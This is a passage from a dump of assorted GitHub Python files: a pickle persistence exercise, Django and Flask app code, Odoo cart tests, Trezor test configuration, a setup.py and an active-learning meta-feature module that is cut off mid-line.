guesses\n\n\n","repo_name":"Kustonm/IA","sub_path":"classification/mira.py","file_name":"mira.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35228938890","text":"import pickle\n\nclass Persona:\n\n def __init__(self, nombre, genero, edad):\n self.nombre=nombre\n self.genero=genero\n self.edad=edad\n print(\"Persona nueva, de nombre \", self.nombre)\n \n def __str__(self):\n return \"{}{}{}\".format(self.nombre, self.genero, self.edad)\n\nclass ListaPersonas:\n\n personas=[]\n\n def __init__(self):\n listaDePersonas=open(\"ficheroExterno\",\"ab+\")\n listaDePersonas.seek(0)\n\n try:\n self.personas=pickle.load(listaDePersonas)\n print(\"Se cargaron {} personas del fichero externo\".format(len(self.personas)))\n except:\n print(\"El fichero está vacío\")\n finally:\n listaDePersonas.close()\n del(listaDePersonas)\n\n\n def agregarPersonas(self, p):\n self.personas.append(p)\n self.guardarPersonasEnFicheroExterno()\n\n def mostrarPersonas(self):\n for p in self.personas:\n print(p)\n \n def guardarPersonasEnFicheroExterno(self):\n listaDePersonas=open(\"ficheroExterno\",\"wb\")\n pickle.dump(self.personas, listaDePersonas)\n listaDePersonas.close()\n del(listaDePersonas)\n\n def mostrarInfoFicheroExterno(self):\n print(\"La info del fichero externo: \")\n for p in self.personas:\n print(p)\n\n\nmiLista=ListaPersonas()\n\np=Persona(\"Sandra\", \"Femenino\",39)\nmiLista.agregarPersonas(p)\np=Persona(\"Antonio\", \"Masculino\",19)\nmiLista.agregarPersonas(p)\np=Persona(\"Ana\", \"Femenino\",29)\nmiLista.agregarPersonas(p)\n\nmiLista.mostrarPersonas()\n\n","repo_name":"aaronperezs/PythonLearning","sub_path":"Python Learning/guardado_permanente.py","file_name":"guardado_permanente.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33436667120","text":"from django.conf.urls import url\nfrom . import views\napp_name = 'epinmain'\nurlpatterns = [\n url(r'^login/$', views.index,name= 'login'),\n url(r'^auth/$', views.auth_detection, name='login'),\n url(r'^signup/$', views.signup, name='signup'),\n url(r'^logout/$', views.logout, name='logout'),\n url(r'^createaccounts/$', views.createaccounts, name='logout'),\n\n]","repo_name":"WoodProgrammer/gamer_trnet","sub_path":"epin/epinmain/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"15337290125","text":"import pandas as pd\nimport numpy as np\n\n# data_range = To create a list\n# periods = Period of time specified\n# 20221201 = yyyy/mm/dd\ndf_pd_datas = pd.date_range(start=\"2024/01/01\", end=\"2024/2/01\", freq=\"D\")\nprint(f\"{df_pd_datas} \\n\\n\")\n\ndf_pd_months = pd.date_range(start=\"2024/01/01\", periods=len(df_pd_datas), freq='M')\nprint(f\"{df_pd_months} \\n\\n\")\n\n\n# The parameters in rand receive respectively the amount of rows and columns\naleatory_numbers = pd.DataFrame(np.random.rand(5, 1))\nprint(f\"{aleatory_numbers} \\n\\n\")\n\n\n# First you need to transform the list into a DataFrame\ndf1 = pd.DataFrame(df_pd_datas)\ndf2 = pd.DataFrame(df_pd_months)\n\nconcat_days_months = pd.concat([df1, df2])\nprint(concat_days_months)\n\n\n# I'm gonna create a DF with two columns\nsuper_df = pd.DataFrame({\n \"Days\": df_pd_datas,\n \"Months\": df_pd_months\n})\n\nprint(f\"\\n\\n{super_df}\")\n","repo_name":"pachecosamuel/Curso-Pandas","sub_path":"DataFrame/aula01.py","file_name":"aula01.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30783985663","text":"from odoo.addons.shopinvader.tests.common import CommonCase\nfrom odoo.addons.shopinvader.tests.test_cart_item import ItemCaseMixin\n\n\nclass ConnectedItemCase(ItemCaseMixin, CommonCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls._setup_products()\n cls.partner = cls.env.ref(\"shopinvader.partner_1\")\n cls.cart = cls.env.ref(\"shopinvader.sale_order_2\")\n cls.pkg_box = cls.env[\"product.packaging\"].create(\n {\n \"name\": \"Box\",\n \"product_id\": cls.product_1.id,\n \"qty\": 50,\n \"barcode\": \"BOX\",\n }\n )\n cls.pkg_big_box = cls.env[\"product.packaging\"].create(\n {\n \"name\": \"Big Box\",\n \"product_id\": cls.product_1.id,\n \"qty\": 200,\n \"barcode\": \"BIGBOX\",\n }\n )\n cls.pkg_pallet = cls.env[\"product.packaging\"].create(\n {\n \"name\": \"Pallet\",\n \"product_id\": cls.product_1.id,\n \"qty\": 2000,\n \"barcode\": \"PALLET\",\n }\n )\n # This module adds new keys: recompute\n cls._refresh_json_data(\n cls, cls.cart.mapped(\"order_line.product_id\") + cls.product_1\n )\n\n def setUp(self):\n super().setUp()\n self.shopinvader_session = {\"cart_id\": self.cart.id}\n with self.work_on_services(\n partner=self.partner, shopinvader_session=self.shopinvader_session\n ) as work:\n self.service = work.component(usage=\"cart\")\n\n def test_add_item(self):\n self.remove_cart()\n last_order = self.env[\"sale.order\"].search([], limit=1, order=\"id desc\")\n # TODO: in theory we should be able to skip prod qty\n # since it's computed in `sale_order_line_packaging_qty `\n cart = self.add_item(\n self.product_1.id,\n 1,\n packaging_id=self.pkg_pallet,\n packaging_qty=2.0,\n )\n self.assertGreater(cart[\"id\"], last_order.id)\n self.assertEqual(len(cart[\"lines\"][\"items\"]), 1)\n self.assertEqual(cart[\"lines\"][\"count\"], 4000)\n cart_line = cart[\"lines\"][\"items\"][0]\n # check SO line values\n line = self.env[\"sale.order.line\"].browse(cart_line[\"id\"])\n self.assertEqual(line.product_packaging, self.pkg_pallet)\n self.assertEqual(line.product_packaging_qty, 2.0)\n self.assertEqual(line.product_uom_qty, 4000)\n # Check cart line values\n self.check_product_and_qty(cart_line, self.product_1.id, 4000)\n self.assertEqual(\n cart_line[\"packaging\"],\n {\n \"id\": self.pkg_pallet.id,\n \"name\": self.pkg_pallet.packaging_type_id.name,\n \"code\": self.pkg_pallet.packaging_type_id.code,\n \"barcode\": self.pkg_pallet.barcode,\n },\n )\n self.assertEqual(cart_line[\"packaging_qty\"], 2)\n self.assertIn(\"sell_only_by_packaging\", cart_line[\"product\"])\n\n def test_update_item(self):\n line = self.cart.order_line[0]\n product = line.product_id\n cart = self.update_item(\n line.id, 1, packaging_id=self.pkg_pallet, packaging_qty=3.0\n )\n # check SO line values\n self.assertEqual(line.product_packaging, self.pkg_pallet)\n self.assertEqual(line.product_packaging_qty, 3.0)\n self.assertEqual(line.product_uom_qty, 6000)\n # Check cart line values\n cart_line = [x for x in cart[\"lines\"][\"items\"] if x[\"id\"] == line.id][0]\n self.check_product_and_qty(cart_line, product.id, 6000)\n self.assertEqual(\n cart_line[\"packaging\"],\n {\n \"id\": self.pkg_pallet.id,\n \"name\": self.pkg_pallet.packaging_type_id.name,\n \"code\": self.pkg_pallet.packaging_type_id.code,\n \"barcode\": self.pkg_pallet.barcode,\n },\n )\n self.assertEqual(cart_line[\"packaging_qty\"], 3.0)\n self.assertIn(\"sell_only_by_packaging\", cart_line[\"product\"])\n\n def test_copy_line(self):\n line = self.cart.order_line[0]\n product = line.product_id\n line.write(\n {\n \"product_packaging\": self.pkg_pallet.id,\n \"product_packaging_qty\": 4.0,\n }\n )\n self.assertEqual(line.product_uom_qty, 8000)\n cart = self.extract_cart(\n self.service.dispatch(\"copy\", params={\"id\": self.cart.id})\n )\n cart_line = [\n x for x in cart[\"lines\"][\"items\"] if x[\"product\"][\"id\"] == product.id\n ][0]\n self.assertIn(\"sell_only_by_packaging\", cart_line[\"product\"])\n self.check_product_and_qty(cart_line, product.id, 8000)\n # Check cart line values\n self.assertEqual(\n cart_line[\"packaging\"],\n {\n \"id\": self.pkg_pallet.id,\n \"name\": self.pkg_pallet.packaging_type_id.name,\n \"code\": self.pkg_pallet.packaging_type_id.code,\n \"barcode\": self.pkg_pallet.barcode,\n },\n )\n self.assertEqual(cart_line[\"packaging_qty\"], 4.0)\n # check SO line values\n line = self.env[\"sale.order.line\"].browse(cart_line[\"id\"])\n self.assertEqual(line.product_packaging, self.pkg_pallet)\n self.assertEqual(line.product_packaging_qty, 4.0)\n self.assertEqual(line.product_uom_qty, 8000)\n\n # TODO: add tests for packaging computation\n","repo_name":"shopinvader/odoo-shopinvader","sub_path":"shopinvader_sale_packaging/tests/test_cart.py","file_name":"test_cart.py","file_ext":"py","file_size_in_byte":5542,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"81"} +{"seq_id":"14745151095","text":"\"\"\"Packaging settings.\"\"\"\n\nfrom setuptools import setup\nfrom codecs import open\nfrom os import path\nfrom dunkirk import __version__\n\nhere = path.abspath(path.dirname(__file__))\nwith open(path.join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name = 'dunkirk',\n version = __version__,\n description = 'Export all your Apple iCloud Notes to text files',\n long_decription = long_description,\n long_description_content_type = 'text/markdown',\n url = 'https://github.com/filfreire/dunkirk',\n author = 'Filipe Freire',\n author_email = 'livrofubia@gmail.com',\n license = 'MIT',\n classifiers = [\n 'Development Status :: 3 - Alpha',\n 'Environment :: Console',\n 'License :: OSI Approved :: MIT License',\n 'Intended Audience :: End Users/Desktop',\n 'Topic :: Utilities',\n 'Natural Language :: English',\n 'Operating System :: MacOS',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.6',\n ],\n keywords = 'apple icloud notes text files',\n entry_points = {\n 'console_scripts': ['dunkirk = dunkirk.dunkirk:main']\n },\n packages = ['dunkirk'],\n install_requires = [\n 'biplist >= 1.0.3',\n 'beautifulsoup4 >= 4.6.0',\n 'docopt >= 0.6.2'\n ],\n)\n","repo_name":"filfreire/dunkirk","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"39686812356","text":"import pandas as pd\nimport os\nimport numpy as np\nfolder_path = '/Users/user/Desktop/200/saved_files/Grouping Patients/'\nsave_path = '/Users/user/Desktop/200/saved_files/Grouping Patients/'\n\n\nfor i in range(1,6):\n data = np.zeros((18, 14))\n if i==4:\n continue\n group_path = folder_path + 'DG' + str(i) + '/'\n data_dirlist = os.listdir(group_path)\n for index in data_dirlist:\n read_file = pd.read_csv(group_path + index, header = None).iloc[1:, 1:]\n data += read_file\n data /= len(data_dirlist)\n output_data = pd.DataFrame(data)\n output_data.to_csv(save_path + 'DG' + str(i) + ' Matrix.csv')\n","repo_name":"tanyaniazi/ITU-Markovian_Dynamic_programming-HW","sub_path":"grouping_diseases.py","file_name":"grouping_diseases.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4812635537","text":"import functools\nimport os\n\nimport pytest\n\nfrom trezorlib import debuglink, log\nfrom trezorlib.debuglink import TrezorClientDebugLink\nfrom trezorlib.device import wipe as wipe_device\nfrom trezorlib.transport import enumerate_devices, get_transport\n\nTREZOR_VERSION = None\n\n\ndef get_device():\n path = os.environ.get(\"TREZOR_PATH\")\n if path:\n transport = get_transport(path)\n else:\n devices = enumerate_devices()\n for device in devices:\n if hasattr(device, \"find_debug\"):\n transport = device\n break\n else:\n raise RuntimeError(\"No debuggable device found\")\n env_interactive = int(os.environ.get(\"INTERACT\", 0))\n try:\n return TrezorClientDebugLink(transport, auto_interact=not env_interactive)\n except Exception as e:\n raise RuntimeError(\n \"Failed to open debuglink for {}\".format(transport.get_path())\n ) from e\n\n\ndef device_version():\n client = get_device()\n if client.features.model == \"T\":\n return 2\n else:\n return 1\n\n\n@pytest.fixture(scope=\"function\")\ndef client():\n client = get_device()\n wipe_device(client)\n\n client.open()\n yield client\n client.close()\n\n\ndef setup_client(mnemonic=None, pin=\"\", passphrase=False):\n if mnemonic is None:\n mnemonic = \" \".join([\"all\"] * 12)\n if pin is True:\n pin = \"1234\"\n\n def client_decorator(function):\n @functools.wraps(function)\n def wrapper(client, *args, **kwargs):\n debuglink.load_device_by_mnemonic(\n client,\n mnemonic=mnemonic,\n pin=pin,\n passphrase_protection=passphrase,\n label=\"test\",\n language=\"english\",\n )\n return function(client, *args, **kwargs)\n\n return wrapper\n\n return client_decorator\n\n\ndef pytest_configure(config):\n # try to figure out trezor version\n global TREZOR_VERSION\n try:\n TREZOR_VERSION = device_version()\n except Exception:\n pass\n\n # register known markers\n config.addinivalue_line(\"markers\", \"skip_t1: skip the test on Trezor One\")\n config.addinivalue_line(\"markers\", \"skip_t2: skip the test on Trezor T\")\n with open(os.path.join(os.path.dirname(__file__), \"REGISTERED_MARKERS\")) as f:\n for line in f:\n config.addinivalue_line(\"markers\", line.strip())\n\n # enable debug\n if config.getoption(\"verbose\"):\n log.enable_debug_output()\n\n\ndef pytest_runtest_setup(item):\n \"\"\"\n Called for each test item (class, individual tests).\n\n Performs custom processing, mainly useful for trezor CI testing:\n * 'skip_t2' tests are skipped on T2 and 'skip_t1' tests are skipped on T1.\n * no test should have both skips at the same time\n \"\"\"\n if TREZOR_VERSION is None:\n pytest.fail(\"No debuggable Trezor is available\")\n\n if item.get_closest_marker(\"skip_t1\") and item.get_closest_marker(\"skip_t2\"):\n pytest.fail(\"Don't skip tests for both trezors!\")\n\n if item.get_closest_marker(\"skip_t2\") and TREZOR_VERSION == 2:\n pytest.skip(\"Test excluded on Trezor T\")\n if item.get_closest_marker(\"skip_t1\") and TREZOR_VERSION == 1:\n pytest.skip(\"Test excluded on Trezor 1\")\n","repo_name":"mollaf/trezor-firmware","sub_path":"python/trezorlib/tests/device_tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"5144818169","text":"from dal import autocomplete\nfrom django import forms\n\nfrom core.models import Location\nfrom .models import Subscriber\n\n\nclass SubscriberForm(forms.ModelForm):\n def __init__(self, *args, **kwargs):\n super(SubscriberForm, self).__init__(*args, **kwargs)\n self.fields['email'].widget.attrs.update(placeholder='Email address')\n self.fields['user_location'].label = \"Location\"\n\n user_location = forms.ModelChoiceField(\n queryset=Location.objects.all(),\n widget=autocomplete.ModelSelect2(url='location-autocomplete'),\n )\n\n class Meta:\n model = Subscriber\n fields = ('email', 'user_location',)\n","repo_name":"catoa/weather-app","sub_path":"subscribers/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37430004580","text":"from flask import Blueprint\nfrom flask import current_app as app\nfrom middleware.middleware import auth\nfrom pandas import read_csv\nfrom matplotlib import pyplot\nfrom statsmodels.graphics.tsaplots import plot_pacf, plot_acf\nfrom statsmodels.tsa.arima_model import ARIMA\nimport statsmodels.api as sm\nimport pandas as pd\nimport time\nimport threading\nimport os\nfrom sklearn.metrics import mean_squared_error\ntimeSeries_bp = Blueprint('timeSeries_bp', __name__)\n\n\ndef updateTestAndTrain():\n global train\n global test\n global value\n while(True):\n time.sleep(value)\n dataRow = test.head(1)\n train = pd.concat([train, dataRow], axis=0).reset_index(drop=True)\n test = test.iloc[1:]\n\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\nForeign_Exchange_Rates = pd.read_csv(dir_path + \"/dataset.csv\")\ndf = Foreign_Exchange_Rates[['Time Serie',\n 'AUSTRALIA - AUSTRALIAN DOLLAR/US$']]\ngdf = df[df['AUSTRALIA - AUSTRALIAN DOLLAR/US$'] == 'ND']\ndf = pd.concat([df, gdf, gdf]).drop_duplicates(keep=False)\ndf = df.reset_index(drop=True)\n#plot_pacf(df['AUSTRALIA - AUSTRALIAN DOLLAR/US$'], lags=5)\n#plot_acf(df['AUSTRALIA - AUSTRALIAN DOLLAR/US$'],lags=3000)\ndf.rename(columns={'Time Serie': 'index'}, inplace=True)\ndf.rename(columns={'AUSTRALIA - AUSTRALIAN DOLLAR/US$': 'value'}, inplace=True)\ndf = pd.DataFrame(df.value.astype(float))\nX = df.value\nsize = int(len(X) * 0.66)\ntrain, test = X[0:size], X[size:len(X)]\nvalue = 300\nt1 = threading.Thread(target=updateTestAndTrain, args=())\nt1.start()\n\n\n# List products with their information\n# (Inforamtion passed from client - items to skip)\n@timeSeries_bp.route('/api/predict/', methods=['GET'])\n@auth\ndef predict(flag):\n global train\n history = [x for x in train]\n model = ARIMA(history, order=(1, 0, 0))\n model_fit = model.fit(disp=0)\n if(flag == '0'):\n output = model_fit.forecast()\n yhat = output[0]\n yhat = str(yhat)\n return yhat, 200\n\n elif(flag == '1'):\n output = model_fit.forecast(7)\n yhat = output[0]\n yhat = str(yhat)\n return yhat, 200\n\n elif(flag == '2'):\n output = model_fit.forecast(30)\n yhat = output[0]\n yhat = str(yhat)\n return yhat, 200\n\n else:\n s = 'please check the flag value given'\n return s, 200\n","repo_name":"Ishar-Menon/tokenizer","sub_path":"server/timeSeriesAnalysis/timeSeriesAnalysis_routes.py","file_name":"timeSeriesAnalysis_routes.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"37998315412","text":"\"\"\"\nMeta features designing for binary classification tasks \n in the pool based active learning scenario.\n\"\"\"\nimport os\nimport h5py\nimport numpy as np \n\nfrom sklearn.cluster import KMeans\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.preprocessing import Normalizer,minmax_scale\nfrom sklearn.utils.validation import check_array\nfrom sklearn.datasets import make_classification\nfrom sklearn.svm import SVC\n\nfrom model import naive_bayes_classifier, knn_classifier, logistic_regression_classifier, \\\n random_forest_classifier, decision_tree_classifier, svm_classifier, svm_cross_validation, gradient_boosting_classifier\n\nclassifiers = {'NB':naive_bayes_classifier, \n 'KNN':knn_classifier, \n 'LR':logistic_regression_classifier, \n 'RF':random_forest_classifier, \n 'DT':decision_tree_classifier, \n 'SVM':svm_classifier, \n 'SVMCV':svm_cross_validation, \n 'GBDT':gradient_boosting_classifier \n}\n\ndef randperm(n, k=None):\n \"\"\"Generate a random array which contains k elements range from (n[0]:n[1])\n\n Parameters\n ----------\n n: int or tuple\n range from [n[0]:n[1]], include n[0] and n[1].\n if an int is given, then n[0] = 0\n\n k: int, optional (default=end - start + 1)\n how many numbers will be generated. should not larger than n[1]-n[0]+1,\n default=n[1] - n[0] + 1.\n\n Returns\n -------\n perm: list\n the generated array.\n \"\"\"\n if isinstance(n, np.generic):\n n = np.asscalar(n)\n if isinstance(n, tuple):\n if n[0] is not None:\n start = n[0]\n else:\n start = 0\n end = n[1]\n elif isinstance(n, int):\n start = 0\n end = n\n else:\n raise TypeError(\"n must be tuple or int.\")\n\n if k is None:\n k = end - start + 1\n if not isinstance(k, int):\n raise TypeError(\"k must be an int.\")\n if k > end - start + 1:\n raise ValueError(\"k should not larger than n[1]-n[0]+1\")\n\n randarr = np.arange(start, end + 1)\n np.random.shuffle(randarr)\n return randarr[0:k]\n\nclass DataSet():\n \"\"\"\n\n Parameters\n ----------\n X: 2D array, optional (default=None) [n_samples, n_features]\n Feature matrix of the whole dataset. It is a reference which will not use additional memory.\n\n y: array-like, optional (default=None) [n_samples]\n Label matrix of the whole dataset. It is a reference which will not use additional memory.\n \n \"\"\"\n def __init__(self, dataset_name, dataset_path=None, X=None, y=None): \n self.dataset_name = dataset_name\n if dataset_path:\n self.get_dataset(dataset_path)\n elif (X is not None) and (y is not None) :\n self.X = X\n self.y = y\n else:\n raise ValueError(\"Please input dataset_path or X, y\")\n self.n_samples, self.n_features = np.shape(self.X)\n self.distance = None\n \n def get_dataset(self, dataset_path):\n \"\"\"\n Get the dataset by name.\n The dataset format is *.mat.\n \"\"\"\n filename = dataset_path + self.dataset_name +'.mat'\n dt = h5py.File(filename, 'r')\n self.X = np.transpose(dt['x'])\n self.y = np.transpose(dt['y'])\n \n def get_cluster_center(self, n_clusters=10, method='Euclidean'):\n \"\"\"Use the Kmeans in sklearn to get the cluster centers.\n\n Parameters\n ----------\n n_clusters: int \n The number of cluster centers.\n Returns\n -------\n data_cluster_centers: np.ndarray\n The samples in origin dataset X is the closest to the cluster_centers.\n index_cluster_centers: np.ndarray\n The index corresponding to the samples in origin data set. \n \"\"\"\n # if self.distance is None:\n # self.get_distance()\n data_cluster = KMeans(n_clusters=n_clusters, random_state=0).fit(self.X)\n data_origin_cluster_centers = data_cluster.cluster_centers_\n closest_distance_data_cluster_centers = np.zeros(n_clusters) + np.infty\n index_cluster_centers = np.zeros(n_clusters, dtype=int) - 1\n \n # obtain the cluster centers index\n for i in range(self.n_samples):\n for j in range(n_clusters):\n if method == 'Euclidean':\n distance = np.linalg.norm(self.X[i] - data_origin_cluster_centers[j])\n if distance < closest_distance_data_cluster_centers[j]:\n closest_distance_data_cluster_centers[j] = distance\n index_cluster_centers[j] = i\n\n if(np.any(index_cluster_centers == -1)):\n raise IndexError(\"data_cluster_centers_index is wrong\")\n\n return self.X[index_cluster_centers], index_cluster_centers\n\n def get_distance(self, method='Euclidean'):\n \"\"\"\n\n Parameters\n ----------\n method: str\n The method calculate the distance.\n Returns\n -------\n distance_martix: 2D\n D[i][j] reprensts the distance between X[i] and X[j].\n \"\"\"\n if self.n_samples == 1:\n raise ValueError(\"There is only one sample.\")\n \n distance = np.zeros((self.n_samples, self.n_samples))\n for i in range(1, self.n_samples):\n for j in range(i+1, self.n_samples):\n if method == 'Euclidean':\n distance[i][j] = np.linalg.norm(self.X[i] - self.X[j])\n \n self.distance = distance + distance.T\n return self.distance\n \n def split_data(self, test_ratio=0.3, initial_label_rate=0.05, split_count=10, saving_path='.'):\n \"\"\"Split given data.\n\n Parameters\n ----------\n test_ratio: float, optional (default=0.3)\n Ratio of test set\n\n initial_label_rate: float, optional (default=0.05)\n Ratio of initial label set\n e.g. Initial_labelset*(1-test_ratio)*n_samples\n\n split_count: int, optional (default=10)\n Random split data _split_count times\n\n saving_path: str, optional (default='.')\n Giving None to disable saving.\n\n Returns\n -------\n train_idx: list\n index of training set, shape like [n_split_count, n_training_indexes]\n\n test_idx: list\n index of testing set, shape like [n_split_count, n_testing_indexes]\n\n label_idx: list\n index of labeling set, shape like [n_split_count, n_labeling_indexes]\n\n unlabel_idx: list\n index of unlabeling set, shape like [n_split_count, n_unlabeling_indexes]\n \"\"\"\n # check parameters\n len_of_parameters = [len(self.X) if self.X is not None else None, len(self.y) if self.y is not None else None]\n number_of_instance = np.unique([i for i in len_of_parameters if i is not None])\n if len(number_of_instance) > 1:\n raise ValueError(\"Different length of instances and _labels found.\")\n else:\n number_of_instance = number_of_instance[0]\n\n instance_indexes = np.arange(number_of_instance)\n\n # split\n train_idx = []\n test_idx = []\n label_idx = []\n unlabel_idx = []\n for i in range(split_count):\n rp = randperm(number_of_instance - 1)\n cutpoint = round((1 - test_ratio) * len(rp))\n tp_train = instance_indexes[rp[0:cutpoint]]\n train_idx.append(tp_train)\n test_idx.append(instance_indexes[rp[cutpoint:]])\n cutpoint = round(initial_label_rate * len(tp_train))\n if cutpoint <= 1:\n cutpoint = 1\n label_idx.append(tp_train[0:cutpoint])\n unlabel_idx.append(tp_train[cutpoint:])\n\n # self.split_save(train_idx=train_idx, test_idx=test_idx, label_idx=label_idx,\n # unlabel_idx=unlabel_idx, path=saving_path)\n return train_idx, test_idx, label_idx, unlabel_idx\n\n def split_load(self, path):\n \"\"\"Load split from path.\n\n Parameters\n ----------\n path: str\n Path to a dir which contains train_idx.txt, test_idx.txt, label_idx.txt, unlabel_idx.txt.\n\n Returns\n -------\n train_idx: list\n index of training set, shape like [n_split_count, n_training_samples]\n\n test_idx: list\n index of testing set, shape like [n_split_count, n_testing_samples]\n\n label_idx: list\n index of labeling set, shape like [n_split_count, n_labeling_samples]\n\n unlabel_idx: list\n index of unlabeling set, shape like [n_split_count, n_unlabeling_samples]\n \"\"\"\n if not isinstance(path, str):\n raise TypeError(\"A string is expected, but received: %s\" % str(type(path)))\n saving_path = os.path.abspath(path)\n if not os.path.isdir(saving_path):\n raise Exception(\"A path to a directory is expected.\")\n\n ret_arr = []\n for fname in ['train_idx.txt', 'test_idx.txt', 'label_idx.txt', 'unlabel_idx.txt']:\n if not os.path.exists(os.path.join(saving_path, fname)):\n if os.path.exists(os.path.join(saving_path, fname.split()[0] + '.npy')):\n ret_arr.append(np.load(os.path.join(saving_path, fname.split()[0] + '.npy')))\n else:\n ret_arr.append(None)\n else:\n ret_arr.append(np.loadtxt(os.path.join(saving_path, fname)))\n return ret_arr[0], ret_arr[1], ret_arr[2], ret_arr[3]\n\n def split_save(self, train_idx, test_idx, label_idx, unlabel_idx, path):\n \"\"\"Save the split to file for auditting or loading for other methods.\n\n Parameters\n ----------\n saving_path: str\n path to save the settings. If a dir is not provided, it will generate a folder called\n 'alipy_split' for saving.\n\n \"\"\"\n if path is None:\n return\n else:\n if not isinstance(path, str):\n raise TypeError(\"A string is expected, but received: %s\" % str(type(path)))\n\n saving_path = os.path.abspath(path)\n if os.path.isdir(saving_path):\n np.savetxt(os.path.join(saving_path, self.dataset_name + '_train_idx.txt'), train_idx)\n np.savetxt(os.path.join(saving_path, self.dataset_name + '_test_idx.txt'), test_idx)\n if len(np.shape(label_idx)) == 2:\n np.savetxt(os.path.join(saving_path, self.dataset_name + '_label_idx.txt'), label_idx)\n np.savetxt(os.path.join(saving_path, self.dataset_name + '_unlabel_idx.txt'), unlabel_idx)\n else:\n np.save(os.path.join(saving_path, self.dataset_name + '_label_idx.npy'), label_idx)\n np.save(os.path.join(saving_path, self.dataset_name + '_unlabel_idx.npy'), unlabel_idx)\n else:\n raise Exception(\"A path to a directory is expected.\")\n\n\ndef mate_data(X, y, distance, cluster_center_index, label_indexs, unlabel_indexs, modelPredictions, query_index):\n \"\"\"Calculate the meta data according to the current model,dataset and five rounds before information.\n\n\n Parameters\n ----------\n X: 2D array\n Feature matrix of the whole dataset. It is a reference which will not use additional memory.\n\n y: {list, np.ndarray}\n The true label of the each round of iteration,corresponding to label_indexs.\n \n distance: 2D\n distance[i][j] reprensts the distance between X[i] and X[j].\n\n cluster_center_index: np.ndarray\n The index corresponding to the samples which is the result of cluster in origin data set. \n\n label_indexs: {list, np.ndarray} shape=(number_iteration, corresponding_label_index)\n The label indexs of each round of iteration,\n\n unlabel_indexs: {list, np.ndarray} shape=(number_iteration, corresponding_unlabel_index)\n The unlabel indexs of each round of iteration,\n\n modelPredictions: {list, np.ndarray} shape=(number_iteration, corresponding_perdiction)\n\n query_index: {list, np.ndarray}\n The unlabel samples will be queride,and calculate the performance improvement after add to the labelset.\n\n query_index: int\n The unlabel samples will be queride,and calculate the performance improvement after add to the labelset.\n\n Returns\n -------\n metadata: 2D array\n The meta data about the current model and dataset.\n \"\"\"\n if(np.any(cluster_center_index == -1)):\n raise IndexError(\"cluster_center_index is wrong\")\n for i in range(6):\n assert(np.shape(X)[0] == np.shape(modelPredictions[i])[0]) \n if(not isinstance(label_indexs[i], np.ndarray)):\n label_indexs[i] = np.array(label_indexs[i])\n if(not isinstance(unlabel_indexs[i], np.ndarray)):\n unlabel_indexs[i] = np.array(unlabel_indexs[i])\n \n n_samples, n_feature = np.shape(X)\n query_index_size = len(query_index)\n n_feature_data = n_feature * np.ones((query_index_size, 1))\n current_label_size = len(label_indexs[5])\n current_label_y = y[label_indexs[5]]\n current_unlabel_size = len(unlabel_indexs[5])\n current_prediction = modelPredictions[5]\n\n ratio_label_positive = (sum(current_label_y > 0)) / current_label_size\n ratio_label_positive_data = ratio_label_positive * np.ones_like(n_feature_data)\n ratio_label_negative = (sum(current_label_y < 0)) / current_label_size\n ratio_label_negative_data = ratio_label_negative * np.ones_like(n_feature_data)\n\n ratio_unlabel_positive = (sum(current_prediction[unlabel_indexs[5]] > 0)) / current_unlabel_size\n ratio_unlabel_positive_data = ratio_unlabel_positive * np.ones_like(n_feature_data)\n ratio_unlabel_negative = (sum(current_prediction[unlabel_indexs[5]] < 0)) / current_unlabel_size\n ratio_unlabel_negative_data = ratio_unlabel_negative * np.ones_like(n_feature_data)\n\n\n # the same dataset the same cluster centers\n # data_cluster = KMeans(n_clusters=10, random_state=0).fit(X)\n # data_origin_cluster_centers_10 = data_cluster.cluster_centers_\n # closest_distance_data_cluster_centers_10 = np.zeros(10) + np.infty\n # data_cluster_centers_10_index = np.zeros(10, dtype=int) - 1\n\n # # obtain the cluster centers index\n # for i in range(n_samples):\n # for j in range(10):\n # distance = np.linalg.norm(X[i] - data_origin_cluster_centers_10[j])\n # if distance < closest_distance_data_cluster_centers_10[j]:\n # closest_distance_data_cluster_centers_10[j] = distance\n # data_cluster_centers_10_index[j] = i\n\n data_cluster_centers_10 = X[cluster_center_index]\n\n \n sorted_labelperdiction_index = np.argsort(current_prediction[label_indexs[5]])\n sorted_current_label_data = X[label_indexs[5][sorted_labelperdiction_index]]\n \n label_10_equal = [sorted_current_label_data[int(i * current_label_size)] for i in np.arange(0, 1, 0.1)]\n label_10_equal_index = [label_indexs[5][sorted_labelperdiction_index][int(i * current_label_size)] for i in np.arange(0, 1, 0.1)]\n\n sorted_unlabelperdiction_index = np.argsort(current_prediction[unlabel_indexs[5]])\n sorted_current_unlabel_data = X[unlabel_indexs[5][sorted_unlabelperdiction_index]]\n unlabel_10_equal = [sorted_current_unlabel_data[int(i * current_unlabel_size)] for i in np.arange(0, 1, 0.1)]\n unlabel_10_equal_index = 